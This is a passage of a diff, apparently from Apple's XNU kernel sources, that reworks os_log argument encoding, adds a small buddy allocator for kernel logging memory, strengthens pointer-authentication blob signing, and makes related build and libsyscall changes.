-                                       done = true;
-                                       break;
-#endif /* !KERNEL */
-
-                               case 's': // string
-                                       value.type.pch = va_arg(args, char *);
-                                       if (!prec && value.type.pch != NULL) {
-                                               prec = (int) strlen(value.type.pch) + 1;
-                                       }
-
-#ifndef KERNEL
-                                       // capture the string pointer to generate a symptom
-                                       if (context->log && context->log->generate_symptoms && context->arg_idx == 0 && value.type.pch) {
-                                               context->symptom_str = value.type.pch;
-                                       }
-#endif
-
-                                       context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-                                       _os_log_encode_arg(value.type.pch, prec, OS_LOG_BUFFER_VALUE_TYPE_STRING, false, context);
-                                       prec = 0;
-                                       done = true;
-                                       break;
-
-#ifndef KERNEL
-                               case 'S': // wide-string
-                                       value.type.pwch = va_arg(args, wchar_t *);
-                                       if (!prec && value.type.pwch != NULL) {
-                                               prec = (int) wcslen(value.type.pwch) + 1;
-                                       }
-
-                                       context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-                                       _os_log_encode_arg(value.type.pwch, prec, OS_LOG_BUFFER_VALUE_TYPE_STRING, false, context);
-                                       prec = 0;
-                                       done = true;
-                                       break;
-#endif /* !KERNEL */
-
-#ifndef KERNEL
-                               case '@': // CFTypeRef aka NSObject *
-                                       context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-                                       _os_log_encode_arg(va_arg(args, void *), 0, OS_LOG_BUFFER_VALUE_TYPE_OBJECT, false, context);
-                                       done = true;
-                                       break;
-#endif /* !KERNEL */
-
-                               case 'm':
-                                       value.type.i = saved_errno;
-                                       _os_log_encode_arg(&value.type.i, sizeof(value.type.i), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                       done = true;
-                                       break;
-
-                               default:
-                                       if (isdigit(ch)) { // [0-9]
-                                               continue;
-                                       }
-                                       return false;
-                               }
-
-                               if (done) {
-                                       percent = strchr(percent, '%'); // Find next format
-                                       break;
-                               }
-                       }
-               } else {
-                       percent = strchr(percent + 1, '%'); // Find next format after %%
-               }
-       }
-
-       context->buffer->arg_cnt = context->arg_idx;
-       context->content_sz = context->content_off;
-       context->pubdata_sz = context->pubdata_off;
-       context->privdata_sz = context->privdata_off;
-       context->arg_idx = context->content_off = context->pubdata_off = context->privdata_off = 0;
-
-       return true;
-}
+void os_log_context_init(os_log_context_t, logmem_t *, uint8_t *, size_t);
+void os_log_context_free(os_log_context_t);
+bool os_log_context_encode(os_log_context_t, const char *, va_list, void *, void *, bool);
 
 #endif /* log_encode_h */
index ac4b44bdb41e480636801ec1e57c09e280acd37e..23a995bd1f9e0916f0aee940e438964d99e2d767 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2015-2016 Apple Inc. All rights reserved.
+ * Copyright (c) 2015-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_LICENSE_HEADER_START@
  *
 #include <stdbool.h>
 #include <stddef.h>
 
+#include "log_mem.h"
+
 #pragma mark - buffer support structures, enums
 
-OS_ENUM(os_log_value_type, uint8_t,
-    OS_LOG_BUFFER_VALUE_TYPE_SCALAR = 0,
-    OS_LOG_BUFFER_VALUE_TYPE_COUNT = 1,
-    OS_LOG_BUFFER_VALUE_TYPE_STRING = 2,
-#ifndef KERNEL
-    OS_LOG_BUFFER_VALUE_TYPE_POINTER = 3,
-    OS_LOG_BUFFER_VALUE_TYPE_OBJECT = 4,
-#endif
+OS_ENUM(os_log_fmt_hdr_flags, uint8_t,
+    OSLF_HDR_FLAG_HAS_PRIVATE    = 0x01,
+    OSLF_HDR_FLAG_HAS_NON_SCALAR = 0x02,
+    );
+
+OS_ENUM(os_log_fmt_cmd_type, uint8_t,
+    OSLF_CMD_TYPE_SCALAR      = 0, // %u, %lld, %x, %p, %g, ...
+    OSLF_CMD_TYPE_COUNT       = 1, // %.16P, %.*s
+    OSLF_CMD_TYPE_STRING      = 2, // %s
+    OSLF_CMD_TYPE_POINTER     = 3, // %P
+    OSLF_CMD_TYPE_OBJECT      = 4, // %@
+    OSLF_CMD_TYPE_WIDE_STRING = 5, // %S
+    OSLF_CMD_TYPE_ERRNO       = 6, // %m
+    OSLF_CMD_TYPE_MASK        = 7, // %{mask.foo}...
     );
 
-OS_ENUM(os_log_value_subtype, uint8_t,
-    OS_LOG_BUFFER_VALUE_SUBTYPE_NONE = 0,
-    OS_LOG_BUFFER_VALUE_SUBTYPE_INTEGER = 1,
-#ifndef KERNEL
-    OS_LOG_BUFFER_VALUE_SUBTYPE_FLOAT = 2,
-#endif
+OS_ENUM(os_log_fmt_cmd_flags, uint8_t,
+    OSLF_CMD_FLAG_PRIVATE    = 0x1,
+    OSLF_CMD_FLAG_PUBLIC     = 0x2,
+    OSLF_CMD_FLAG_SENSITIVE  = 0x4 | OSLF_CMD_FLAG_PRIVATE,
     );
 
 enum os_log_int_types_t {
@@ -67,7 +73,7 @@ enum os_log_int_types_t {
        OST_PTRDIFF   =  5,
 };
 
-union os_log_format_types_u {
+union os_log_fmt_types_u {
        uint16_t    u16;
        uint32_t    u32;
        uint64_t    u64;
@@ -76,100 +82,53 @@ union os_log_format_types_u {
        int         i;
        void        *p;
        char        *pch;
-#ifndef KERNEL
-       wchar_t     wch;
-       wchar_t     *pwch;
-#endif
        size_t      z;
        intmax_t    im;
        ptrdiff_t   pd;
        long        l;
        long long   ll;
-#ifndef KERNEL
-       double      d;
-       float       f;
-       long double ld;
-#endif
 };
 
 typedef struct os_log_format_value_s {
-       union os_log_format_types_u type;
-       os_log_value_type_t ctype;
+       union os_log_fmt_types_u type;
+       os_log_fmt_cmd_type_t ctype;
        uint16_t size;
 } *os_log_format_value_t;
 
-#define OST_FORMAT_MAX_ARGS 48
-#ifdef KERNEL
-#define OST_FORMAT_MAX_STRING_SIZE 512
-#else
-#define OST_FORMAT_MAX_STRING_SIZE 1024
-#endif
-
-#define OST_FORMAT_NON_STATIC ~0
-
-typedef struct os_log_buffer_value_s {
-#define OS_LOG_CONTENT_FLAG_PRIVATE 0x1
-       uint8_t flags : 4;
-       os_log_value_type_t type : 4;
-       uint8_t size;
-       uint8_t value[];
-} *os_log_buffer_value_t;
-
-typedef struct os_log_buffer_s {
-#define OS_LOG_BUFFER_HAS_PRIVATE 0x1
-#define OS_LOG_BUFFER_HAS_NON_SCALAR 0x2
-       uint8_t flags;
-       uint8_t arg_cnt;
-       uint8_t content[];
-} *os_log_buffer_t;
-
-typedef struct os_log_buffer_context_s {
-       os_log_t log;
-       os_log_buffer_t buffer;
-       uint8_t *pubdata;
-       uint8_t *privdata;
-
-       // composed string
-       char *comp;
-       size_t comp_off;
-       size_t comp_sz;
-
-       // sizes and offsets
-       uint16_t content_off; // offset into buffer->content
-       uint16_t content_sz; // size not including the header
-       uint16_t pubdata_off;
-       uint16_t pubdata_sz;
-       uint16_t privdata_off;
-       uint16_t privdata_sz;
-
-       uint8_t arg_idx;
-
-       // if argument content was limited with %.* or %.#
-
-#ifndef KERNEL
-       const char *symptom_str;
-       const void *symptom_ptr;
-       uint16_t symptom_ptr_len;
-       char *annotated;
-#endif
-       int arg_content_sz;
-       bool need_size;
-       bool shimmed;
-} *os_log_buffer_context_t;
-
-typedef struct os_log_arginfo_s {
-       uint16_t offset;
-       uint16_t length;
-} *os_log_arginfo_t;
-
-/* Clients of these interfaces/structures may be expected to provide implementations of the following functions */
+typedef struct os_log_fmt_hdr_s {
+       os_log_fmt_hdr_flags_t hdr_flags;
+       uint8_t hdr_cmd_cnt;
+       uint8_t hdr_data[];
+} *os_log_fmt_hdr_t;
 
-#ifndef KERNEL
-extern bool
-_NSCF2data(const void *obj, char *string_value, size_t string_sz, bool *is_private);
-#endif
+typedef struct os_log_fmt_cmd_s {
+       os_log_fmt_cmd_flags_t cmd_flags : 4;
+       os_log_fmt_cmd_type_t cmd_type : 4;
+       uint8_t cmd_size;
+       uint8_t cmd_data[];
+} *os_log_fmt_cmd_t;
 
-extern bool
-_os_log_string_is_public(const char *str);
+typedef struct os_log_fmt_range_s {
+       uint16_t offset;
+       uint16_t length : 15;
+       uint16_t truncated : 1;
+} *os_log_fmt_range_t;
+
+#define OS_LOG_MAX_PUB_ARGS (32)
+
+typedef struct os_log_context_s {
+       logmem_t                    *ctx_logmem;
+       uint8_t                     *ctx_buffer;
+       size_t                      ctx_buffer_sz;
+       os_log_fmt_hdr_t            ctx_hdr;
+       char                        *ctx_pubdata[OS_LOG_MAX_PUB_ARGS];
+       uint16_t                    ctx_content_off; // offset into buffer->hdr_data
+       uint16_t                    ctx_content_sz; // size not including the header
+       uint16_t                    ctx_pubdata_sz;
+       uint16_t                    ctx_pubdata_cnt;
+       firehose_tracepoint_flags_t ctx_ft_flags;
+       uint8_t                     ctx_truncated : 1;
+       uint8_t                     ctx_allocated : 1;
+} *os_log_context_t;
 
 #endif /* log_encode_types_h */
diff --git a/libkern/os/log_mem.c b/libkern/os/log_mem.c
new file mode 100644 (file)
index 0000000..311082b
--- /dev/null
@@ -0,0 +1,217 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this
+ * file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_LICENSE_HEADER_END@
+ */
+
+#include <stdbool.h>
+#include <stdint.h>
+#include <kern/assert.h>
+#include <kern/locks.h>
+#include <os/atomic_private.h>
+
+#include "log_mem.h"
+
+#define BLOCK_INVALID ((size_t)-1)
+#define BLOCK_LEVEL_BASE(level) ((1 << (level)) - 1)
+#define BLOCK_SIZE(level) (1 << (level))
+#define BLOCK_PARENT(b) (((b) % 2 == 0) ? ((b) >> 1) - 1 : ((b) >> 1))
+#define BLOCK_LCHILD(b) (((b) << 1) + 1)
+#define BLOCK_BUDDY(b) (((b) & 0x1) ? (b) + 1 : (b) - 1)
+#define BLOCK_INDEX(lm, l, a, s) \
+    (BLOCK_LEVEL_BASE(l) + ((uintptr_t)(a) - (uintptr_t)(lm)->lm_mem) / (s))
+
+#define BITMAP_BUCKET_SIZE (8 * sizeof(((logmem_t *)0)->lm_mem_map[0]))
+#define BITMAP_BUCKET(i) ((i) / BITMAP_BUCKET_SIZE)
+#define BITMAP_BIT(i) (1 << (BITMAP_BUCKET_SIZE - ((i) % BITMAP_BUCKET_SIZE) - 1))
+
+static bool
+bitmap_get(logmem_t *lm, size_t block)
+{
+       return lm->lm_mem_map[BITMAP_BUCKET(block)] & BITMAP_BIT(block);
+}
+
+static void
+bitmap_set(logmem_t *lm, size_t block)
+{
+       lm->lm_mem_map[BITMAP_BUCKET(block)] |= BITMAP_BIT(block);
+}
+
+static void
+bitmap_clear(logmem_t *lm, size_t block)
+{
+       lm->lm_mem_map[BITMAP_BUCKET(block)] &= ~BITMAP_BIT(block);
+}
+
+static void
+bitmap_reserve_root(logmem_t *lm, size_t block)
+{
+       const size_t top_block = BLOCK_LEVEL_BASE(lm->lm_cap_order - lm->lm_max_order);
+
+       for (ssize_t next = BLOCK_PARENT(block); next >= top_block; next = BLOCK_PARENT(next)) {
+               /*
+                * If the rest of the root path is already marked as
+                * allocated we are done.
+                */
+               if (bitmap_get(lm, next)) {
+                       break;
+               }
+               bitmap_set(lm, next);
+       }
+}
+
+static void
+bitmap_release_root(logmem_t *lm, size_t block)
+{
+       const size_t top_block = BLOCK_LEVEL_BASE(lm->lm_cap_order - lm->lm_max_order);
+       int buddy_allocated = 0;
+
+       while (block > top_block) {
+               buddy_allocated = bitmap_get(lm, BLOCK_BUDDY(block));
+               block = BLOCK_PARENT(block);
+               /*
+                * If there is another allocation within the parent subtree
+                * in place we cannot mark the rest of the root path as free.
+                */
+               if (buddy_allocated) {
+                       break;
+               }
+               bitmap_clear(lm, block);
+       }
+}
+
+static void
+bitmap_update_subtree(logmem_t *lm, size_t level, size_t block, void (*fun)(logmem_t *, size_t))
+{
+       const size_t lcount = lm->lm_cap_order - lm->lm_min_order - level + 1;
+
+       for (size_t l = 0, n = 1; l < lcount; l++, n <<= 1) {
+               for (int i = 0; i < n; i++) {
+                       fun(lm, block + i);
+               }
+               block = BLOCK_LCHILD(block);
+       }
+}
+
+static void
+bitmap_release_subtree(logmem_t *lm, size_t level, size_t block)
+{
+       bitmap_update_subtree(lm, level, block, bitmap_clear);
+}
+
+static void
+bitmap_reserve_subtree(logmem_t *lm, size_t level, size_t block)
+{
+       bitmap_update_subtree(lm, level, block, bitmap_set);
+}
+
+static size_t
+block_size_level(logmem_t *lm, size_t amount)
+{
+       for (size_t l = lm->lm_min_order; l <= lm->lm_max_order; l++) {
+               if (amount <= BLOCK_SIZE(l)) {
+                       return lm->lm_cap_order - l;
+               }
+       }
+       return BLOCK_INVALID;
+}
+
+static size_t
+block_locate(logmem_t *lm, void *addr, size_t amount, size_t *block)
+{
+       size_t level = block_size_level(lm, amount);
+       if (level != BLOCK_INVALID) {
+               *block = BLOCK_INDEX(lm, level, addr, amount);
+       }
+       return level;
+}
+
+static size_t
+block_reserve(logmem_t *lm, size_t level)
+{
+       assert(level != BLOCK_INVALID);
+
+       const size_t base = BLOCK_LEVEL_BASE(level);
+       const size_t end = base + BLOCK_SIZE(level);
+
+       lck_spin_lock(lm->lm_lock);
+       for (size_t block = base; block < end; block++) {
+               if (!bitmap_get(lm, block)) {
+                       bitmap_reserve_root(lm, block);
+                       bitmap_reserve_subtree(lm, level, block);
+                       lck_spin_unlock(lm->lm_lock);
+                       return block - base;
+               }
+       }
+       lck_spin_unlock(lm->lm_lock);
+
+       return BLOCK_INVALID;
+}
+
+void *
+logmem_alloc(logmem_t *lm, size_t *amount)
+{
+       assert(amount);
+
+       os_atomic_inc(&lm->lm_cnt_allocations, relaxed);
+
+       if (*amount == 0 || *amount > BLOCK_SIZE(lm->lm_max_order)) {
+               os_atomic_inc(&lm->lm_cnt_failed_size, relaxed);
+               return NULL;
+       }
+
+       size_t level = block_size_level(lm, *amount);
+       size_t block = block_reserve(lm, level);
+
+       if (block == BLOCK_INVALID) {
+               os_atomic_inc(&lm->lm_cnt_failed_full, relaxed);
+               return NULL;
+       }
+
+       *amount = BLOCK_SIZE(lm->lm_cap_order - level);
+       os_atomic_sub(&lm->lm_cnt_free, (uint32_t)*amount, relaxed);
+
+       return &lm->lm_mem[block * *amount];
+}
+
+void
+logmem_free(logmem_t *lm, void *addr, size_t amount)
+{
+       assert(addr);
+       assert(amount > 0 && ((amount & (amount - 1)) == 0));
+
+       size_t block = BLOCK_INVALID;
+       size_t level = block_locate(lm, addr, amount, &block);
+       assert(level != BLOCK_INVALID);
+       assert(block != BLOCK_INVALID);
+
+       lck_spin_lock(lm->lm_lock);
+       bitmap_release_root(lm, block);
+       bitmap_release_subtree(lm, level, block);
+       lck_spin_unlock(lm->lm_lock);
+
+       os_atomic_add(&lm->lm_cnt_free, (uint32_t)amount, relaxed);
+}
+
+size_t
+logmem_max_size(const logmem_t *lm)
+{
+       return BLOCK_SIZE(lm->lm_max_order);
+}
diff --git a/libkern/os/log_mem.h b/libkern/os/log_mem.h
new file mode 100644 (file)
index 0000000..d29ca2b
--- /dev/null
@@ -0,0 +1,84 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this
+ * file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_LICENSE_HEADER_END@
+ */
+
+#ifndef log_mem_h
+#define log_mem_h
+
+#include <stddef.h>
+#include <stdint.h>
+
+/*
+ * A simple allocator on a top of a plain byte array. Primarily intended to
+ * support OS kernel logging in order to avoid dependency to VM.
+ */
+typedef struct logmem_s {
+       lck_spin_t *lm_lock;
+       uint8_t     *lm_mem;
+       uint8_t     *lm_mem_map;
+       size_t      lm_cap_order;
+       size_t      lm_min_order;
+       size_t      lm_max_order;
+       uint32_t    lm_cnt_allocations;
+       uint32_t    lm_cnt_failed_size;
+       uint32_t    lm_cnt_failed_full;
+       uint32_t    lm_cnt_free;
+} logmem_t;
+
+/*
+ * Static initializer for global instances of logmem. Size order defines the
+ * total amount of logmem memory, the min and max order set the minimum and the
+ * maximum size respectively of the memory allocatable by the given logmem.
+ * Local or dynamically allocated instances of logmem should not be initialized
+ * by this macro.
+ */
+#define LOGMEM_STATIC_INIT(name, size_order, min_order, max_order) \
+    SIMPLE_LOCK_DECLARE(name##_lck, 0); \
+    logmem_t name = { \
+       .lm_lock = (lck_spin_t *)&name##_lck, \
+       .lm_mem = (uint8_t[(1 << (size_order))]){ 0 }, \
+       .lm_mem_map = (uint8_t[MAX(1, (1 << ((size_order) - (min_order) + 1)) / 8)]){ 0 }, \
+       .lm_cap_order = (size_order), \
+       .lm_max_order = (max_order), \
+       .lm_min_order = (min_order), \
+       .lm_cnt_free = (1 << (size_order)) \
+    };
+
+/*
+ * Allocates memory from a respective logmem. Returns a pointer to the beginning
+ * of the allocated block. The resulting size of the allocated block is equal or
+ * bigger than the size passed in during the call.
+ */
+void *logmem_alloc(logmem_t *, size_t *);
+
+/*
+ * Frees memory previously allocated by logmem_alloc(). The caller must call
+ * logmem_free() with exact pointer and size value returned by logmem_alloc().
+ */
+void logmem_free(logmem_t *, void *, size_t);
+
+/*
+ * Returns the maximum memory size allocatable by the logmem.
+ */
+size_t logmem_max_size(const logmem_t *);
+
+#endif /* log_mem_h */
index 8385a23d104e8d822caa509647c031a45bfa8aca..cd0ddceacd500bf6df415edcdc1d5512f34ddf43 100644 (file)
@@ -40,8 +40,9 @@
  * Sign a blob of data with the GA key
  *
  */
+__attribute__((noinline))
 ptrauth_generic_signature_t
-ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags)
+ptrauth_utils_sign_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags)
 {
        ptrauth_generic_signature_t sig = 0;
 
@@ -58,22 +59,31 @@ ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int
                data ^= (uint64_t)ptr;
        }
 
-       /* First round adds salt */
+       /* First round adds ptrauth_utils_sign_blob_generic discrimination. */
+       sig = ptrauth_sign_generic_data(sig, ptrauth_string_discriminator("ptrauth_utils_sign_blob_generic-prologue") | 0x01);
+
+       /* Second round adds salt */
        sig = ptrauth_sign_generic_data(sig, data);
 
        /* Calculate an additive signature of the buffer */
        for (uint64_t i = 0; i < rounds; i++) {
-               sig = ptrauth_sign_generic_data(*(uintptr_t *)ptr, sig);
+               sig = ptrauth_sign_generic_data(*(const uintptr_t *)ptr, sig);
                ptr += sizeof(uintptr_t);
        }
 
        /* ptrauth_sign_generic_data operates on pointer-sized values only,
         * so we need to handle trailing bytes for the non-pointer-aligned case */
        if (ntrailing) {
-               memcpy(&trailing, ptr, ntrailing);
+               for (int i = 0; i < ntrailing; i++) {
+                       ((uint8_t *)&trailing)[i] = ((const uint8_t *)ptr)[i];
+               }
                sig = ptrauth_sign_generic_data(trailing, sig);
        }
 
+
+       /* Final round to add an additional cookie */
+       sig = ptrauth_sign_generic_data(sig, ptrauth_string_discriminator("ptrauth_utils_sign_blob_generic-epilogue") | 0x01);
+
        return sig;
 }
 
@@ -82,8 +92,9 @@ ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int
  *
  * Authenticate signature produced by ptrauth_utils_sign_blob_generic
  */
+__attribute__((noinline))
 void
-ptrauth_utils_auth_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature)
+ptrauth_utils_auth_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature)
 {
        ptrauth_generic_signature_t calculated_signature = 0;
 
index 308dc426a9fc1d5673eb730101c440acd51f7b4a..b20de6a3d7474e91efa4e02ecf046718342fc5ba 100644 (file)
@@ -68,7 +68,9 @@ KLD_FILES = $(OBJS)
 
 $(COMPONENT).filelist: $(OBJS)
        $(_v)for kld_file in ${KLD_FILES}; do      \
-               $(SEG_HACK) -n __KLD -o $${kld_file}__ $${kld_file} || exit 1; \
+               $(SEG_HACK) -s __TEXT -n __KLD -o $${kld_file}__ $${kld_file} || exit 1; \
+               mv $${kld_file}__ $${kld_file} || exit 1; \
+               $(SEG_HACK) -i __KLD -n __KLDDATA -o $${kld_file}__ $${kld_file} || exit 1; \
                mv $${kld_file}__ $${kld_file} || exit 1; \
        done
        @$(LOG_LDFILELIST) "$(COMPONENT)"
index 15531c0fe38462d428b2972f8fd1d237767fffb9..6255b46ca4599297e68a3da6ec08e6d500385feb 100644 (file)
@@ -63,11 +63,6 @@ CLANG_WARN_SUSPICIOUS_MOVE = YES
 CODE_SIGN_IDENTITY = -
 DYLIB_CURRENT_VERSION = $(RC_ProjectSourceVersion)
 DYLIB_LDFLAGS = -umbrella System -all_load
-DYLIB_LDFLAGS[sdk=iphoneos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000
-DYLIB_LDFLAGS[sdk=watchos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000
-DYLIB_LDFLAGS[sdk=tvos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000
-DYLIB_LDFLAGS[sdk=appletvos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000
-DYLIB_LDFLAGS[sdk=bridgeos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000
 OTHER_LDFLAGS = $(SIMULATOR_LDFLAGS)
 SIMULATOR_LDFLAGS =
 SIMULATOR_LDFLAGS[sdk=macosx*] = -Wl,-simulator_support
index 05e98094877ccbeedb0031785765cde5e0ac5697..74584782f67410d20f2bd14b61430d2f65332baa 100644 (file)
                24B8C2621237F53900D36CC3 /* remove-counter.c in Sources */ = {isa = PBXBuildFile; fileRef = 24B8C2611237F53900D36CC3 /* remove-counter.c */; };
                24D1158311E671B20063D54D /* SYS.h in Headers */ = {isa = PBXBuildFile; fileRef = 24D1157411E671B20063D54D /* SYS.h */; };
                24E4782712088267009A384D /* _libc_funcptr.c in Sources */ = {isa = PBXBuildFile; fileRef = 24E47824120881DF009A384D /* _libc_funcptr.c */; };
+               2561E8AA25082E6300EAA925 /* task.c in Sources */ = {isa = PBXBuildFile; fileRef = 2561E8A925082E6300EAA925 /* task.c */; };
                291D3C281354FDD100D46061 /* mach_port.c in Sources */ = {isa = PBXBuildFile; fileRef = 291D3C261354FDD100D46061 /* mach_port.c */; };
                291D3C291354FDD100D46061 /* mach_vm.c in Sources */ = {isa = PBXBuildFile; fileRef = 291D3C271354FDD100D46061 /* mach_vm.c */; };
                29A59AE2183B0DE000E8B896 /* renameat.c in Sources */ = {isa = PBXBuildFile; fileRef = 29A59AE1183B0DE000E8B896 /* renameat.c */; };
                24D1159811E672270063D54D /* syscall.map */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text; path = syscall.map; sourceTree = "<group>"; };
                24D1159911E6723E0063D54D /* create-syscalls.pl */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.script.perl; path = "create-syscalls.pl"; sourceTree = "<group>"; };
                24E47824120881DF009A384D /* _libc_funcptr.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = _libc_funcptr.c; sourceTree = "<group>"; };
+               2561E8A925082E6300EAA925 /* task.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = task.c; sourceTree = "<group>"; };
                291D3C261354FDD100D46061 /* mach_port.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = mach_port.c; sourceTree = "<group>"; };
                291D3C271354FDD100D46061 /* mach_vm.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = mach_vm.c; sourceTree = "<group>"; };
                29A59AE1183B0DE000E8B896 /* renameat.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = renameat.c; sourceTree = "<group>"; };
                                C9D9BCCC114B00600000D8B9 /* err_libkern.sub */,
                                C9D9BCCD114B00600000D8B9 /* err_mach_ipc.sub */,
                                C9D9BCCE114B00600000D8B9 /* err_server.sub */,
+                               2561E8A925082E6300EAA925 /* task.c */,
                                C9D9BCCF114B00600000D8B9 /* err_us.sub */,
                                C9D9BCD0114B00600000D8B9 /* error_codes.c */,
                                C9D9BCD1114B00600000D8B9 /* errorlib.h */,
                                24A7C5C111FF8DA6007669EB /* getsockname.c in Sources */,
                                925559921CBC23C300E527CE /* mach_boottime.c in Sources */,
                                24A7C5C211FF8DA6007669EB /* lchown.c in Sources */,
+                               2561E8AA25082E6300EAA925 /* task.c in Sources */,
                                24A7C5C311FF8DA6007669EB /* listen.c in Sources */,
                                24A7C5C411FF8DA6007669EB /* recvfrom.c in Sources */,
                                13CBF78224575F9F00B26F7D /* open-base.c in Sources */,
diff --git a/libsyscall/mach/.gitignore b/libsyscall/mach/.gitignore
deleted file mode 100644 (file)
index f718d68..0000000
+++ /dev/null
@@ -1,3 +0,0 @@
-*.pbxuser
-*.perspectivev3
-build/
index 6a7ec639e935069ae6da5dd549eac6d3d678a1f1..6d977fd59cfbb0cabd35f4453585999795f02cee 100644 (file)
@@ -37,8 +37,7 @@ kern_return_t
 host_get_atm_diagnostic_flag(host_t host __unused,
     uint32_t *diagnostic_flag)
 {
-       volatile uint32_t *diagnostic_flag_address = (volatile uint32_t *)(uintptr_t)(_COMM_PAGE_ATM_DIAGNOSTIC_CONFIG);
-       *diagnostic_flag = *diagnostic_flag_address;
+       *diagnostic_flag = COMM_PAGE_READ(uint32_t, ATM_DIAGNOSTIC_CONFIG);
        return KERN_SUCCESS;
 }
 
@@ -47,8 +46,7 @@ host_get_multiuser_config_flags(host_t host __unused,
     uint32_t *multiuser_flags)
 {
 #if (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
-       volatile uint32_t *multiuser_flag_address = (volatile uint32_t *)(uintptr_t)(_COMM_PAGE_MULTIUSER_CONFIG);
-       *multiuser_flags = *multiuser_flag_address;
+       *multiuser_flags = COMM_PAGE_READ(uint32_t, MULTIUSER_CONFIG);
        return KERN_SUCCESS;
 #else
        (void)multiuser_flags;
index 4d9d51f466e859a962e95f7072750b31d7625d68..e223fc8e2e8224eb9a5da0b01805759a67aeb45d 100644 (file)
 
 #include <sys/cdefs.h>
 
+#ifndef KERNEL
+#include <Availability.h>
+#endif
+
 /*
  *     Kernel-related ports; how a task/thread controls itself
  */
@@ -71,6 +75,8 @@
 __BEGIN_DECLS
 extern mach_port_t mach_host_self(void);
 extern mach_port_t mach_thread_self(void);
+__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3))
+extern boolean_t mach_task_is_self(task_name_t task);
 extern kern_return_t host_page_size(host_t, vm_size_t *);
 
 extern mach_port_t      mach_task_self_;
index e237e2757e8f768a7165eebb9f10e9ac5303dfc4..f96418b4b91094cc1b2d63951133ec5b5759e5e9 100644 (file)
@@ -44,6 +44,12 @@ const char *mach_host_special_port_description(int offset);
  */
 const char *mach_task_special_port_description(int offset);
 
+/*
+ * Returns a string describing the thread special port offset provided, or NULL if
+ * the provided offset is not a thread special port offset.
+ */
+const char *mach_thread_special_port_description(int offset);
+
 /*
  * Returns the port for the given identifier of a host special port.  For
  * instance, passing "HOST_PRIV_PORT" would return 1.
@@ -59,6 +65,13 @@ int mach_host_special_port_for_id(const char *id);
  */
 int mach_task_special_port_for_id(const char *id);
 
+/*
+ * Returns the port for the given identifier of a thread special port.
+ *
+ * Returns -1 on error.
+ */
+int mach_thread_special_port_for_id(const char *id);
+
 __END_DECLS
 
 #endif /* !defined(_MACH_PORT_DESCRIPTIONS_) */
index 4206401a8d06e72c9453c104d63858a74628c04d..6a976709bfdebb83749414f60878f1f59fa4aef7 100644 (file)
@@ -137,13 +137,13 @@ mach_init_doit(void)
 
        if (vm_kernel_page_shift == 0) {
 #if defined(__x86_64__) || defined(__i386__)
-               if ((*((uint16_t *)_COMM_PAGE_VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION)) {
-                       vm_kernel_page_shift = *(uint8_t*) _COMM_PAGE_KERNEL_PAGE_SHIFT;
+               if (COMM_PAGE_READ(uint16_t, VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION) {
+                       vm_kernel_page_shift = COMM_PAGE_READ(uint8_t, KERNEL_PAGE_SHIFT);
                } else {
